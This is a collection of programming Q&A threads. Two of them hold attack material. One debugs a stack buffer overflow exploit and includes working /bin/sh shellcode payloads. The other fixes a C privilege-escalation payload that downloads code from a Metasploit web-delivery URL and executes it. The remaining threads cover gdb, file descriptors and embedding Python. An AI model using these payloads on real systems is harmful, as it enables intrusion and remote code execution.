Why is my stack buffer overflow exploit not working?

So I have a really simple stack overflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on Linux x86 and post the results?
UPDATE
Never mind, y'all, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All I'm doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I don't understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spawn a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb, and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack being turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.

Several protections against this attack come straight from the compiler. For example, your stack may not be executable. You can check with:
readelf -l <filename>
If your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).
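A small sketch of reading that line programmatically. It assumes the single-line column layout shown above, where the flags are the second-to-last field; stack_is_executable is a hypothetical helper name, not something readelf provides.

```python
def stack_is_executable(readelf_line):
    """Return True if a GNU_STACK program-header line carries the E flag.

    Assumes the `readelf -l` layout shown above, where the flags
    (for GNU_STACK normally RW or RWE) are the second-to-last field.
    """
    fields = readelf_line.split()
    if not fields or fields[0] != "GNU_STACK":
        raise ValueError("not a GNU_STACK line")
    flags = fields[-2]
    return "E" in flags


line = "GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4"
print(stack_is_executable(line))  # False: the stack is read/write only
```

With a binary built using -z execstack, the flags field would read RWE and the helper would return True.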
Also there could be a canary protection: a value placed in memory between your local variables and the saved return address that is checked for integrity. If your string overwrites it, the program will exit.
If you are trying this on your own program, consider removing some of the protections with gcc options:
gcc -z execstack
Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that should be placed inside the instruction pointer you can modify the last hex digits to point somewhere inside your nops and not necessarily at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something like that.
Hope this helps.

This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1, summed over all environment variables) and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. envcount), creates a char *envp[envcount + 1] on the stack, and fills in the envp values with pointers to the given strings. It null terminates this envp.
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On x86-64, the argc, argv, and envp values are passed in the first three argument registers of the System V ABI (rdi, rsi, rdx). On 32-bit x86, as in the question, they are passed on the stack instead.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte4>,<byte5>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8.
So, then do: *fp = argv[1] and return.
Note that extra steps may be necessary: the string pointed to by argv[1] lives on the stack, as mentioned above, so if the stack has the NX bit set, jumping to it will fault.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}

I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
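unsigned long printesp(void){
unsigned long esp;
/* copy the stack pointer into a C variable instead of relying on eax */
__asm__("movl %%esp,%0" : "=r"(esp));
return esp;
}
And called it at the end of main, right before the return, to get an idea of where the stack was. From there I just played with that value, subtracting 4 from the printed ESP until it worked.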

Related

How do I apply the printers.py modification? (Linux OS)

I checked the core file because the process (written in C++) running on Linux died, and saw the following:
[Corefile]
File "/usr/lib64/../share/gdb/python/libstdcxx/v6/printers.py", line 558, in to_string
return self.val['_M_dataplus']['_M_p'].lazy_string (length = len)
RuntimeError: Cannot access memory at address 0x3b444e45203b290f
I think that there was a problem with class StdStringPrinter at printers.py.
So I found posts on this site that explain the problem I was looking into, modified printers.py, created a .gdbinit in my home directory, and wrote the content shown below.
How to enable gdb pretty printing for C++ STL objects in Eclipse CDT?
Eclipse/CDT Pretty Print Errors
But this method is a little different from the one I'm looking for because it's done in Eclipse.
my gdb version is 7.6.1-94.el7
[printer.py]
class StdStringPrinter:
    "Print a std::basic_string of some kind"
    def __init__(self, typename, val):
        self.val = val
    def to_string(self):
        # Make sure &string works, too.
        type = self.val.type
        if type.code == gdb.TYPE_CODE_REF:
            type = type.target ()
        sys.stdout.write("HelloWorld")  # TEST code
        # Calculate the length of the string so that to_string returns
        # the string according to length, not according to first null
        # encountered.
        ptr = self.val ['_M_dataplus']['_M_p']
        realtype = type.unqualified ().strip_typedefs ()
        reptype = gdb.lookup_type (str (realtype) + '::_Rep').pointer ()
        header = ptr.cast(reptype) - 1
        len = header.dereference ()['_M_length']
        if hasattr(ptr, "lazy_string"):
            return ptr.lazy_string (length = len)
        return ptr.string (length = len)
    def display_hint (self):
        return 'string'
[.gdbinit]
python
import sys
sys.path.insert(0, '/home/Hello/gcc-4.8.2/python')
from libstdcxx.v6.printers import register_libstdcxx_printers
register_libstdcxx_printers (None)
end
My question is to modify printers.py, write gdbinit, and then re-compile the process to test whether it has been applied as modified.
How can I print my modified TEST code at Linux Terminal?

I think that there was a problem with class StdStringPrinter at printers.py
I think you are fundamentally confused, and your problem has nothing at all to do with printers.py.
You didn't show us your GDB session, but it appears that you have tried to print some variable of type std::string, and when you did so, GDB produced this error:
RuntimeError: Cannot access memory at address 0x3b444e45203b290f
What this error means is that GDB could not read a value from memory location 0x3b444e45203b290f. On an x86_64 system, such a location indeed cannot be readable, because that address does not have canonical form.
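To make "canonical form" concrete, here is a minimal sketch of the check, assuming the common 48-bit virtual address layout (4-level paging), where bits 63 through 47 must all be equal. The helper name is hypothetical.

```python
def is_canonical_x86_64(addr):
    """True if bits 63..47 of a 64-bit address are all 0 or all 1.

    Assumes 48-bit virtual addresses (4-level paging).
    """
    top = addr >> 47  # the upper 17 bits
    return top == 0 or top == 0x1FFFF


print(is_canonical_x86_64(0x3b444e45203b290f))  # False
print(is_canonical_x86_64(0x00007fffffffe000))  # True
```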
Conclusion: the pointer that you followed (likely a pointer to std::string in your program) does not actually point to std::string. "Fixing" the printers.py is not going to solve that problem.
This conclusion is corroborated by
the process(c++ lang) running on Linux died,
Finally, the pointer that you gave GDB to print: 0x3b444e45203b290f looks suspiciously like an ASCII string. Decoding it, we have: \xf); END;. So it's very likely that your program scribbled ); END; over a location where the pointer was supposed to be, and that you have a buffer overflow of some sort.
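The decoding is easy to reproduce. This sketch lays the 64-bit value out in little-endian order, which is how x86_64 stores it in memory; pointer_as_bytes is a hypothetical helper name.

```python
def pointer_as_bytes(value):
    """Return the 8 bytes of a 64-bit value in little-endian (memory) order."""
    return value.to_bytes(8, "little")


print(pointer_as_bytes(0x3b444e45203b290f))  # b'\x0f); END;'
```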
P.S.
My question is to modify printers.py, write gdbinit, and then re-compile the process to test whether it has been applied as modified.
This question also shows fundamental misunderstanding of how printers.py works. It has nothing to do with your program (it's loaded into GDB).
Recompiling anything (either your program or GDB) is not required. Simply restarting GDB should be all that's necessary for it to pick up the new version of printers.py (not that that would fix anything).

How can I get the new name of a renamed file given its file descriptor/object? [duplicate]

Is it possible to get the filename of a file descriptor (Linux) in C?

You can use readlink on /proc/self/fd/NNN where NNN is the file descriptor. This will give you the name of the file as it was when it was opened — however, if the file was moved or deleted since then, it may no longer be accurate (although Linux can track renames in some cases). To verify, stat the filename given and fstat the fd you have, and make sure st_dev and st_ino are the same.
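A minimal Linux-only sketch of this readlink-then-verify approach, written in Python for brevity (os.readlink, os.stat and os.fstat wrap the same system calls). The function name fd_to_path is an assumption for illustration.

```python
import os


def fd_to_path(fd):
    """Return the path Linux reports for fd, or None if it cannot be verified.

    Linux-only: relies on the /proc/self/fd/<N> symlinks.
    """
    try:
        path = os.readlink("/proc/self/fd/%d" % fd)
    except OSError:
        return None
    if not path.startswith("/"):
        return None  # not a file, e.g. "pipe:[1538488]"
    try:
        by_name = os.stat(path)
    except OSError:
        return None  # deleted or moved: the reported name is stale
    by_fd = os.fstat(fd)
    # Same device and inode means the name still refers to the open file.
    if (by_name.st_dev, by_name.st_ino) == (by_fd.st_dev, by_fd.st_ino):
        return path
    return None
```

Returning None for anything that fails verification keeps callers from trusting a stale name.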
Of course, not all file descriptors refer to files, and for those you'll see some odd text strings, such as pipe:[1538488]. Since all of the real filenames will be absolute paths, you can determine which these are easily enough. Further, as others have noted, files can have multiple hardlinks pointing to them - this will only report the one it was opened with. If you want to find all names for a given file, you'll just have to traverse the entire filesystem.

I had this problem on Mac OS X. We don't have a /proc virtual file system, so the accepted solution cannot work.
We do, instead, have a F_GETPATH command for fcntl:
F_GETPATH Get the path of the file descriptor Fildes. The argument must be a buffer of size MAXPATHLEN or greater.
So to get the file associated to a file descriptor, you can use this snippet:
#include <sys/syslimits.h>
#include <fcntl.h>
char filePath[PATH_MAX];
if (fcntl(fd, F_GETPATH, filePath) != -1)
{
// do something with the file path
}
Since I never remember where MAXPATHLEN is defined, I thought PATH_MAX from syslimits would be fine.

In Windows, with GetFileInformationByHandleEx, passing FileNameInfo, you can retrieve the file name.

As Tyler points out, there's no way to do what you require "directly and reliably", since a given FD may correspond to 0 filenames (in various cases) or > 1 (multiple "hard links" is how the latter situation is generally described). If you do still need the functionality with all the limitations (on speed AND on the possibility of getting 0, 2, ... results rather than 1), here's how you can do it: first, fstat the FD -- this tells you, in the resulting struct stat, what device the file lives on, how many hard links it has, whether it's a special file, etc. This may already answer your question -- e.g. if 0 hard links you will KNOW there is in fact no corresponding filename on disk.
If the stats give you hope, then you have to "walk the tree" of directories on the relevant device until you find all the hard links (or just the first one, if you don't need more than one and any one will do). For that purpose, you use readdir (and opendir &c of course) recursively opening subdirectories until you find in a struct dirent thus received the same inode number you had in the original struct stat (at which time if you want the whole path, rather than just the name, you'll need to walk the chain of directories backwards to reconstruct it).
If this general approach is acceptable, but you need more detailed C code, let us know, it won't be hard to write (though I'd rather not write it if it's useless, i.e. you cannot withstand the inevitably slow performance or the possibility of getting != 1 result for the purposes of your application;-).
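As a rough sketch of the fstat-then-walk idea, here it is in Python rather than C (os.fstat, os.lstat and os.walk stand in for fstat, lstat and the opendir/readdir recursion). The function name and the root parameter are assumptions for illustration; pass the mount point of the relevant device as root.

```python
import os


def find_names_for_fd(fd, root):
    """Return every path under root that is a hard link to the file open on fd."""
    target = os.fstat(fd)
    if target.st_nlink == 0:
        return []  # unlinked: no name exists on disk any more
    matches = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in filenames:
            candidate = os.path.join(dirpath, name)
            try:
                st = os.lstat(candidate)
            except OSError:
                continue  # vanished or unreadable while we were walking
            if (st.st_dev, st.st_ino) == (target.st_dev, target.st_ino):
                matches.append(candidate)
                if len(matches) == target.st_nlink:
                    return matches  # found every link the inode reports
    return matches
```

The walk stops early once it has found as many names as the link count reports; otherwise it has to visit the whole tree, which is the slow case described above.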

Before writing this off as impossible I suggest you look at the source code of the lsof command.
There may be restrictions but lsof seems capable of determining the file descriptor and file name. This information exists in the /proc filesystem so it should be possible to get at from your program.

You can use fstat() to get the file's inode by struct stat. Then, using readdir() you can compare the inode you found with those that exist (struct dirent) in a directory (assuming that you know the directory, otherwise you'll have to search the whole filesystem) and find the corresponding file name.
Nasty?

There is no official API to do this on OpenBSD, though it is still possible with some very convoluted workarounds, using the following code. Note that you need to link with -lkvm and -lc. The code using FTS to traverse the filesystem is from this answer.
#include <string>
#include <vector>
#include <climits>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <sys/stat.h>
#include <fts.h>
#include <sys/sysctl.h>
#include <kvm.h>
using std::string;
using std::vector;
string pidfd2path(int pid, int fd) {
string path; char errbuf[_POSIX2_LINE_MAX];
static kvm_t *kd = nullptr; kinfo_file *kif = nullptr; int cntp = 0;
kd = kvm_openfiles(nullptr, nullptr, nullptr, KVM_NO_FILES, errbuf); if (!kd) return "";
if ((kif = kvm_getfiles(kd, KERN_FILE_BYPID, pid, sizeof(struct kinfo_file), &cntp))) {
for (int i = 0; i < cntp; i++) {
if (kif[i].fd_fd == fd) {
FTS *file_system = nullptr; FTSENT *child = nullptr; FTSENT *parent = nullptr;
vector<char *> root; char buffer[2]; strcpy(buffer, "/"); root.push_back(buffer);
file_system = fts_open(&root[0], FTS_COMFOLLOW | FTS_NOCHDIR, nullptr);
if (file_system) {
while ((parent = fts_read(file_system))) {
child = fts_children(file_system, 0);
while (child && child->fts_link) {
child = child->fts_link;
if (!S_ISSOCK(child->fts_statp->st_mode)) {
if (child->fts_statp->st_dev == kif[i].va_fsid) {
if (child->fts_statp->st_ino == kif[i].va_fileid) {
path = child->fts_path + string(child->fts_name);
goto finish;
}
}
}
}
}
finish:
fts_close(file_system);
}
}
}
}
kvm_close(kd);
return path;
}
int main(int argc, char **argv) {
if (argc == 3) {
printf("%s\n", pidfd2path((int)strtoul(argv[1], nullptr, 10),
(int)strtoul(argv[2], nullptr, 10)).c_str());
} else {
printf("usage: \"%s\" <pid> <fd>\n", argv[0]);
}
return 0;
}
If the function fails to find the file, (for example, because it no longer exists), it will return an empty string. If the file was moved, in my experience when moving the file to the trash, the new location of the file is returned instead if that location wasn't already searched through by FTS. It'll be slower for filesystems that have more files.
The deeper the search goes in the directory tree of your entire filesystem without finding the file, the more likely you are to have a race condition, though still very unlikely due to how performant this is. I'm aware my OpenBSD solution is C++ and not C. Feel free to change it to C; most of the code logic will be the same. If I have time I'll try to rewrite this in C, hopefully soon.
Like macOS, this solution gets a hard link at random (citation needed), for portability with Windows and other platforms which can only get one hard link. You could remove the early exit (the goto finish) from the while loop and return a vector if you don't care about being cross-platform and want to get all the hard links.
DragonFly BSD and NetBSD have the same solution (the exact same code) as the macOS solution on the current question, which I verified manually. If a macOS user wishes to get a path from a file descriptor opened by any process, by plugging in a process id, and not be limited to just the calling one, while also potentially getting all hard links rather than a random one, see this answer. It should be a lot more performant than traversing your entire filesystem, similar to how fast it is on Linux and other solutions that are more straightforward and to the point.
FreeBSD users can get what they are looking for in this question, because the OS-level bug mentioned in that question has since been resolved for newer OS versions.
Here's a more generic solution which can only retrieve the path of a file descriptor opened by the calling process. However, it should work for most Unix-likes out of the box, with all the same concerns as the former solution in regards to hard links and race conditions, although it performs slightly faster because it has fewer branches and loops:
#include <string>
#include <vector>
#include <cstring>
#include <sys/stat.h>
#include <fts.h>
using std::string;
using std::vector;
string fd2path(int fd) {
string path;
FTS *file_system = nullptr; FTSENT *child = nullptr; FTSENT *parent = nullptr;
vector<char *> root; char buffer[2]; strcpy(buffer, "/"); root.push_back(buffer);
file_system = fts_open(&root[0], FTS_COMFOLLOW | FTS_NOCHDIR, nullptr);
if (file_system) {
while ((parent = fts_read(file_system))) {
child = fts_children(file_system, 0);
while (child && child->fts_link) {
child = child->fts_link; struct stat info = { 0 };
if (!S_ISSOCK(child->fts_statp->st_mode)) {
if (!fstat(fd, &info) && !S_ISSOCK(info.st_mode)) {
if (child->fts_statp->st_dev == info.st_dev) {
if (child->fts_statp->st_ino == info.st_ino) {
path = child->fts_path + string(child->fts_name);
goto finish;
}
}
}
}
}
}
finish:
fts_close(file_system);
}
return path;
}
An even quicker approach, also limited to the calling process, is to wrap all your calls to fopen() and open() in a helper that stores each file descriptor together with the absolute path of the file in a map (in C, whatever equivalent of std::unordered_map you have; you will likely have to write it yourself using malloc()'d and eventually free()'d int and C-string arrays). The same goes for the Windows-only equivalents such as _wopen_s(), which won't work on UWP. The absolute path can be obtained with realpath() on Unix-likes or GetFullPathNameW() (the *W variant, for Unicode support) on Windows. Both convert a relative path to an absolute one, and realpath() also resolves symbolic links (which aren't nearly as commonly used on Windows).
This is faster than any solution that searches the filesystem dynamically, but it has a different and unappealing limitation: it does not notice files that were moved after you opened them. You can at least check whether the file was deleted by testing for existence yourself, but you cannot tell whether the file was replaced since you stored its path, so the results may be outdated. Let me know if you would like to see a code example of this, though because files can change location I do not recommend this solution.
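A minimal sketch of that wrapper idea, in Python rather than C so that the built-in dict plays the role of the map. All names here (tracked_open, tracked_close, recorded_path, _fd_paths) are hypothetical, and the staleness caveats described above still apply.

```python
import os

_fd_paths = {}  # hypothetical registry: file descriptor -> absolute path at open time


def tracked_open(path, flags, mode=0o666):
    """Open path like os.open() and remember its resolved absolute path."""
    fd = os.open(path, flags, mode)
    _fd_paths[fd] = os.path.realpath(path)
    return fd


def tracked_close(fd):
    """Close fd and forget its recorded path."""
    os.close(fd)
    _fd_paths.pop(fd, None)


def recorded_path(fd):
    """Return the path recorded when fd was opened, or None if it no longer exists."""
    path = _fd_paths.get(fd)
    if path is None or not os.path.exists(path):
        return None
    return path
```

The existence check only catches deletion or renaming; a different file created at the same path afterwards would still be reported.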

Impossible. A file descriptor may have multiple names in the filesystem, or it may have no name at all.
Edit: Assuming you are talking about a plain old POSIX system, without any OS-specific APIs, since you didn't specify an OS.

How to stop URL from being commented out (C)

I've been attempting a privilege escalation exploit on Linux, and it will run whatever file is at /tmp/run as the root user (Linux kernel 2.6 UDEV exploit). I've decided to make my payload in C (for an added challenge). It simply needs to execute a single python command (generated by Metasploit's web delivery module). The issue is, when I enter a URL as a string, the // in http:// will comment out the rest of the URL.
I don't know that much C whatsoever, so I have no idea how to fix this issue. This may seem a bit noob-ish, but I really can't find an answer anywhere.
Current code:
#include <stdio.h>
int main(void) {
system("python -c \"import urllib2; r = urllib2.urlopen('http://0.0.0.0:8080/tmmPIejv70OV'); exec(r.read());\"" <== // in http:// comments out rest of line
return 0;
}
Is there a proper way to fix this?

// does not start a comment inside a string literal, so the // in the URL is not your problem. Instead, the system() call is missing its closing ) and the terminating semicolon.
#include <stdio.h>
int main(void) {
system("python -c \"import urllib2; r = urllib2.urlopen('http://0.0.0.0:8080/tmmPIejv70OV'); exec(r.read());\"");
return 0;
}

Python - C embedded Segmentation fault

I am facing a problem similar to the one in "Py_Initialize / Py_Finalize not working twice with numpy". The basic code in C:
Py_Initialize();
import_array();
//Call a python function which imports numpy as a module
//Py_Finalize()
The program is in a loop and it gives a seg fault if the python code has numpy as one of the imported module. If I remove numpy, it works fine.
As a temporary work around I tried not to use Py_Finalize(), but that is causing huge memory leaks [ observed as the memory usage from TOP keeps on increasing ]. And I tried but did not understand the suggestion in that link I posted. Can someone please suggest the best way to finalize the call while having imports such as numpy.
Thanks
santhosh.

I recently faced a very similar issue and developed a workaround that works for my purposes, so I thought I would write it here in the hope it might help others.
The problem
I work with a postprocessing pipeline for which I can write my own functor to work on some data passing through the pipeline, and I wanted to be able to use Python scripts for some of the operations.
The problem is that the only thing I can control is the functor itself, which gets instantiated and destroyed at times beyond my control. I furthermore have the problem that even if I do not call Py_Finalize the pipeline sometimes crashes once I pass another dataset through the pipeline.
The solution in a Nutshell
For those who don't want to read the whole story and get straight to the point, here's the gist of my solution:
The main idea behind my workaround is not to link against the Python library, but instead load it dynamically using dlopen and then get all the addresses of the required Python functions using dlsym. Once that's done, one can call Py_Initialize() followed by whatever you want to do with Python functions followed by a call to Py_Finalize() once you're done. Then, one can simply unload the Python library. The next time you need to use Python functions, simply repeat the steps above and Bob's your uncle.
However, if you are importing NumPy at any point between Py_Initialize and Py_Finalize, you will also need to look for all the currently loaded libraries in your program and manually unload those using dlclose.
Detailed workaround
Loading instead of linking Python
The main idea as I mentioned above is not to link against the Python library. Instead, what we will do is load the Python library dynamically using dlopen():
#include <dlfcn.h>
...
void* pHandle = dlopen("/path/to/library/libpython2.7.so", RTLD_NOW | RTLD_GLOBAL);
The code above loads the Python shared library and returns a handle to it (the return type is an opaque pointer type, thus the void*). The second argument (RTLD_NOW | RTLD_GLOBAL) is there to make sure that the symbols are properly imported into the current application's scope.
Once we have a pointer to the handle of the loaded library, we can search that library for the functions it exports using the dlsym function:
#include <dlfcn.h>
...
// Typedef named 'void_func_t' which holds a pointer to a function with
// no arguments with no return type
typedef void (*void_func_t)(void);
void_func_t MyPy_Initialize = dlsym(pHandle, "Py_Initialize");
The dlsym function takes two parameters: a pointer to the handle of the library that we obtained previously and the name of the function we are looking for (in this case, Py_Initialize). Once we have the address of the function we want, we can create a function pointer and initialize it to that address. To actually call the Py_Initialize function, one would then simply write:
MyPy_Initialize();
For all the other functions provided by the Python C-API, one can just add calls to dlsym and initialize function pointers to its return value and then use those function pointers instead of the Python functions. One simply has to know the parameter and return value of the Python function in order to create the correct type of function pointer.
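The same load, look up, declare-the-signature, call sequence can be tried quickly from Python's ctypes, which wraps dlopen and dlsym on POSIX systems. This is only an illustration of the pattern: it loads the C library and looks up strlen rather than libpython and Py_Initialize, and the fallback to the process's own handle is an assumption for systems where find_library returns None.

```python
import ctypes
import ctypes.util

# Assumption for illustration: load the C library rather than libpython.
# If find_library returns None, CDLL(None) falls back to dlopen(NULL),
# the handle for the running program itself (POSIX only).
libc = ctypes.CDLL(ctypes.util.find_library("c"))

# Attribute access performs the symbol lookup (dlsym on POSIX).
c_strlen = libc.strlen

# Like the typedef in C, the signature has to be declared by hand;
# ctypes assumes int arguments and an int return value otherwise.
c_strlen.argtypes = [ctypes.c_char_p]
c_strlen.restype = ctypes.c_size_t

print(c_strlen(b"Py_Initialize"))  # 13
```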
Once we are finished with the Python functions and call Py_Finalize using a procedure similar to the one for Py_Initialize one can unload the Python dynamic library in the following way:
dlclose(pHandle);
pHandle = NULL;
Manually unloading NumPy libraries
Unfortunately, this does not solve the segmentation faults that occur when importing NumPy. The problem comes from the fact that NumPy also loads some libraries using dlopen (or something equivalent), and those do not get unloaded when you call Py_Finalize. Indeed, if you list all the loaded libraries within your program, you will notice that after closing the Python environment with Py_Finalize, followed by a call to dlclose, some NumPy libraries will remain loaded in memory.
The second part of the solution requires listing all the Python libraries that remain in memory after the call to dlclose(pHandle);. Then, for each of those libraries, grab a handle to it and call dlclose on it. After that, they should get unloaded automatically by the operating system.
Fortunately, there are functions for listing the loaded libraries under both Windows and Linux (sorry MacOS, couldn't find anything that would work in your case...):
- Linux: dl_iterate_phdr
- Windows: EnumProcessModules in conjunction with OpenProcess and GetModuleFileNameEx
Linux
This is rather straight forward once you read the documentation about dl_iterate_phdr:
#include <link.h>
#include <string>
#include <vector>
// global variables are evil!!! but this is just for demonstration purposes...
std::vector<std::string> loaded_libraries;
// callback function that gets called for every loaded library that
// dl_iterate_phdr finds
int dl_list_callback(struct dl_phdr_info *info, size_t, void *)
{
loaded_libraries.push_back(info->dlpi_name);
return 0;
}
int main()
{
...
loaded_libraries.clear();
dl_iterate_phdr(dl_list_callback, NULL);
// loaded_libraries now contains a list of all dynamic libraries loaded
// in your program
....
}
Basically, the function dl_iterate_phdr cycles through all the loaded libraries (in the reverse order they were loaded) until either the callback returns something other than 0 or it reaches the end of the list. To save the list, the callback simply adds each element to a global std::vector (one should obviously avoid global variables and use a class for example).
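For a quick cross-check of what dl_iterate_phdr reports, the same information can be read from /proc/self/maps on Linux. Note this is a different technique from the callback above, sketched in Python; the function name and the ".so in the file name" filter are assumptions for illustration.

```python
import os


def list_mapped_shared_objects():
    """Return the distinct shared-object paths mapped into this process (Linux-only)."""
    seen = []
    with open("/proc/self/maps") as maps:
        for line in maps:
            fields = line.split(None, 5)
            # The sixth field, when present, is the backing file path or a
            # pseudo-name such as [heap] or [stack].
            if len(fields) < 6:
                continue
            path = fields[5].strip()
            if not path.startswith("/"):
                continue
            # Heuristic: keep files that look like shared objects (libfoo.so.6).
            if ".so" in os.path.basename(path) and path not in seen:
                seen.append(path)
    return seen
```

Calling it once before and once after loading a library and comparing the two lists shows which objects that load pulled in.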
Windows
Under Windows, things get a little more complicated, but still manageable:
#include <windows.h>
#include <psapi.h>
#include <string>
#include <vector>
std::vector<std::string> list_loaded_libraries()
{
std::vector<std::string> m_asDllList;
HANDLE hProcess(OpenProcess(PROCESS_QUERY_INFORMATION
| PROCESS_VM_READ,
FALSE, GetCurrentProcessId()));
if (hProcess) {
HMODULE hMods[1024];
DWORD cbNeeded;
if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)) {
const DWORD SIZE(cbNeeded / sizeof(HMODULE));
for (DWORD i(0); i < SIZE; ++i) {
TCHAR szModName[MAX_PATH];
// Get the full path to the module file.
if (GetModuleFileNameEx(hProcess,
hMods[i],
szModName,
sizeof(szModName) / sizeof(TCHAR))) {
#ifdef UNICODE
std::wstring wStr(szModName);
std::string tModuleName(wStr.begin(), wStr.end());
#else
std::string tModuleName(szModName);
#endif /* UNICODE */
if (tModuleName.substr(tModuleName.size()-3) == "dll") {
m_asDllList.push_back(tModuleName);
}
}
}
}
CloseHandle(hProcess);
}
return m_asDllList;
}
The code in this case is slightly longer than for the Linux case, but the main idea is the same: list all the loaded libraries and save them into a std::vector. Don't forget to also link your program to the Psapi.lib!
Manual unloading
Now that we can list all the loaded libraries, all you need to do is find among those the ones that come from loading NumPy, grab a handle to them and then call dlclose on that handle. The code below will work on both Windows and Linux, provided that you use the dlfcn-win32 library.
#ifdef WIN32
# include <windows.h>
# include <psapi.h>
# include "dlfcn_win32.h"
#else
# include <dlfcn.h>
# include <link.h> // for dl_iterate_phdr
#endif /* WIN32 */
#include <string>
#include <vector>
// Function that lists all loaded libraries (not implemented here)
std::vector<std::string> list_loaded_libraries();
